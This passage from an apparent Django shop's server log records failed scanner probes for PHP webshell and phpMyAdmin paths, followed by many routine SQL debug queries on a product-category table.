6340 Not Found: /izom.php [30/Dec/2019 08:04:17] "GET /izom.php HTTP/1.0" 404 6334 Not Found: /new_license.php [30/Dec/2019 08:04:22] "GET /new_license.php HTTP/1.0" 404 6355 Not Found: /images/!.php [30/Dec/2019 08:04:23] "GET /images/!.php HTTP/1.0" 404 6346 Not Found: /up.php [30/Dec/2019 08:04:53] "GET /up.php HTTP/1.0" 404 6328 Not Found: /laravel.php [30/Dec/2019 08:04:54] "GET /laravel.php HTTP/1.0" 404 6343 Not Found: /huoshan.php [30/Dec/2019 08:04:57] "GET /huoshan.php HTTP/1.0" 404 6343 [30/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 Not Found: /zz.php [30/Dec/2019 08:05:25] "GET /zz.php HTTP/1.0" 404 6328 Not Found: /coonig.php [30/Dec/2019 08:05:27] "GET /coonig.php HTTP/1.0" 404 6340 Not Found: /ak.php [30/Dec/2019 08:05:28] "GET /ak.php HTTP/1.0" 404 6328 Not Found: /hhhhhh.php [30/Dec/2019 08:05:33] "GET /hhhhhh.php HTTP/1.0" 404 6340 Not Found: /indea.php [30/Dec/2019 08:06:09] "GET /indea.php HTTP/1.0" 404 6337 Not Found: /kk.php [30/Dec/2019 08:06:17] "GET /kk.php HTTP/1.0" 404 6328 Not Found: /xsser.php [30/Dec/2019 08:06:21] "GET /xsser.php HTTP/1.0" 404 6337 Not Found: /zzz.php [30/Dec/2019 08:06:22] "GET /zzz.php HTTP/1.0" 404 6331 Not Found: /dp.php [30/Dec/2019 08:06:25] "GET /dp.php HTTP/1.0" 404 6328 Not Found: /1ts.php [30/Dec/2019 08:06:33] "GET /1ts.php HTTP/1.0" 404 6331 Not Found: /root11.php [30/Dec/2019 08:06:49] "GET /root11.php HTTP/1.0" 404 6340 Not Found: /wuwu11.php [30/Dec/2019 08:06:53] "POST /wuwu11.php HTTP/1.0" 404 6341 Not Found: /xw.php [30/Dec/2019 08:06:54] "POST /xw.php HTTP/1.0" 404 6329 Not Found: /xw1.php [30/Dec/2019 08:06:57] "POST /xw1.php HTTP/1.0" 404 6332 Not Found: /wc.php [30/Dec/2019 08:07:01] "POST /wc.php HTTP/1.0" 404 6329 Not Found: /sheep.php [30/Dec/2019 08:07:29] "POST /sheep.php HTTP/1.0" 404 6338 Not Found: /qaq.php [30/Dec/2019 08:07:33] "POST /qaq.php HTTP/1.0" 404 6332 Not Found: /my.php [30/Dec/2019 08:07:34] "POST /my.php HTTP/1.0" 404 6329 Not Found: /qq.php [30/Dec/2019 08:07:37] "POST /qq.php HTTP/1.0" 404 6329 Not Found: /aaa.php [30/Dec/2019 08:07:41] "POST /aaa.php HTTP/1.0" 404 6332 Not Found: /hhh.php [30/Dec/2019 08:07:42] "POST /hhh.php HTTP/1.0" 404 6332 DEBUG 2019-12-30 08:08:46,334 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [30/Dec/2019 08:08:46] "GET /joomla/ HTTP/1.0" 404 1728 Not Found: /user.php [30/Dec/2019 08:08:53] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6335 Not Found: /index.php [30/Dec/2019 08:08:55] "GET /index.php HTTP/1.0" 404 6337 Not Found: /phpmyadmin/index.php [30/Dec/2019 08:08:56] "GET /phpmyadmin/index.php HTTP/1.0" 404 6370 Not Found: /pmd/index.php [30/Dec/2019 08:09:03] "GET /pmd/index.php HTTP/1.0" 404 6349 Not Found: /pma/index.php [30/Dec/2019 08:09:04] "GET /pma/index.php HTTP/1.0" 404 6349 Not Found: /PMA/index.php [30/Dec/2019 08:09:05] "GET /PMA/index.php HTTP/1.0" 404 6349 Not Found: /pmamy/index.php [30/Dec/2019 08:09:13] "GET /pmamy/index.php HTTP/1.0" 404 6355 Not Found: /mysql/index.php [30/Dec/2019 08:09:17] "GET /mysql/index.php HTTP/1.0" 404 6355 Not Found: /admin/index.php [30/Dec/2019 08:09:18] "GET /admin/index.php HTTP/1.0" 404 8782 Not Found: /admin/PMA/index.php [30/Dec/2019 08:09:37] "GET /admin/PMA/index.php HTTP/1.0" 404 8794 Not Found: /admin/phpmyadmin2/index.php [30/Dec/2019 08:09:57] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 8818 Not Found: /mysql_admin/index.php [30/Dec/2019 08:10:05] "GET /mysql_admin/index.php HTTP/1.0" 404 6373 Not Found: /phpmyadmin1/index.php [30/Dec/2019 08:10:25] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6373 Not Found: /phpmyadmin2/index.php [30/Dec/2019 08:10:26] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6373 Not Found: /phpMyAdmin-4.4.0/index.php [30/Dec/2019 08:10:29] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6388 Not Found: /phpMyAdmin4.8.0/index.php [30/Dec/2019 08:10:31] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.1/index.php [30/Dec/2019 08:10:33] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.3/index.php [30/Dec/2019 08:10:40] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.4/index.php [30/Dec/2019 08:10:45] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6385 Not Found: /myadmin2/index.php [30/Dec/2019 08:10:54] "GET /myadmin2/index.php HTTP/1.0" 404 6364 Not Found: /xampp/phpmyadmin/index.php [30/Dec/2019 08:10:54] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6388 Not Found: /phpMyadmin_bak/index.php [30/Dec/2019 08:10:55] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6382 Not Found: /tools/phpMyAdmin/index.php [30/Dec/2019 08:10:59] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6388 Not Found: /phpmyadmin-old/index.php [30/Dec/2019 08:10:59] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6382 Not Found: /pma-old/index.php [30/Dec/2019 08:11:05] "GET /pma-old/index.php HTTP/1.0" 404 6361 Not Found: /claroline/phpMyAdmin/index.php [30/Dec/2019 08:11:09] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6400 Not Found: /typo3/phpmyadmin/index.php [30/Dec/2019 08:11:10] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6388 Not Found: /phpMyAbmin/index.php [30/Dec/2019 08:11:29] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdmin__/index.php [30/Dec/2019 08:11:30] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6376 Not Found: /phpMyAdmin+++---/index.php [30/Dec/2019 08:11:31] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6388 Not Found: /v/index.php [30/Dec/2019 08:11:33] "GET /v/index.php HTTP/1.0" 404 6343 Not Found: /phpmyadm1n/index.php [30/Dec/2019 08:11:36] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdm1n/index.php [30/Dec/2019 08:11:36] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6370 Not Found: /shaAdmin/index.php [30/Dec/2019 08:11:37] "GET /shaAdmin/index.php HTTP/1.0" 404 6364 Not Found: /s/index.php [30/Dec/2019 08:11:45] "GET /s/index.php HTTP/1.0" 404 6343 Not Found: /phpMyAdmin123/index.php [30/Dec/2019 08:11:57] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6379 Not Found: /phpMydmin/index.php [30/Dec/2019 08:12:13] "GET /phpMydmin/index.php HTTP/1.0" 404 6367 Not Found: /phpMyAdmin._/index.php [30/Dec/2019 08:12:17] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6376 Not Found: /phpMyAdmin._2/index.php [30/Dec/2019 08:12:21] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6379 Not Found: /phpMyAdmin333/index.php [30/Dec/2019 08:12:29] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6379 Not Found: /php2MyAdmin/index.php [30/Dec/2019 08:12:31] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6373 Not Found: /phpiMyAdmin/index.php [30/Dec/2019 08:12:33] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6373 Not Found: /phpNyAdmin/index.php [30/Dec/2019 08:12:35] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdmin_111/index.php [30/Dec/2019 08:12:41] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6382 Not Found: /321/index.php [30/Dec/2019 08:12:48] "GET /321/index.php HTTP/1.0" 404 6349 Not Found: /mysql/admin/index.php [30/Dec/2019 08:13:37] "GET /mysql/admin/index.php HTTP/1.0" 404 6373 Not Found: /sqladmin/index.php [30/Dec/2019 08:13:53] "GET /sqladmin/index.php HTTP/1.0" 404 6364 Not Found: /SQL/index.php [30/Dec/2019 08:14:01] "GET /SQL/index.php HTTP/1.0" 404 6349 Not Found: /manager/html [30/Dec/2019 08:14:13] "GET /manager/html HTTP/1.0" 404 6346 [30/Dec/2019 08:14:17] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:19:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:24:38] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:29:55] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:34:58] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:40:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:45:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:50:37] "GET / HTTP/1.0" 302 0 [30/Dec/2019 08:56:54] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:16:18] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:21:37] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:26:39] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:31:57] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 09:33:22,008 utils 2749 140297222735616 (0.009) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-30 09:33:22,016 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-30 09:33:22,020 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-30 09:33:22,023 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 09:33:22,027 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-30 09:33:22,029 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-30 09:33:22,032 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-30 09:33:22,034 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-30 09:33:22,036 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-30 09:33:22,040 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-30 09:33:22,043 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-30 09:33:22,045 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-30 09:33:22,048 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-30 09:33:22,050 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-30 09:33:22,054 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-30 09:33:22,056 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-30 09:33:22,059 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-30 09:33:22,061 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-30 09:33:22,064 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-30 09:33:22,067 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-30 09:33:22,070 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-30 09:33:22,075 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-30 09:33:22,080 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-30 09:33:22,084 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-30 09:33:22,088 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-30 09:33:22,093 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-30 09:33:22,097 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-30 09:33:22,100 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-30 09:33:22,103 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-30 09:33:22,105 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-30 09:33:22,109 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-30 09:33:22,111 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-30 09:33:22,114 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-30 09:33:22,116 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-30 09:33:22,119 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-30 09:33:22,123 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-30 09:33:22,125 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-30 09:33:22,127 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-30 09:33:22,130 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-30 09:33:22,132 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-30 09:33:22,135 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-30 09:33:22,139 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-30 09:33:22,142 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-30 09:33:22,144 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 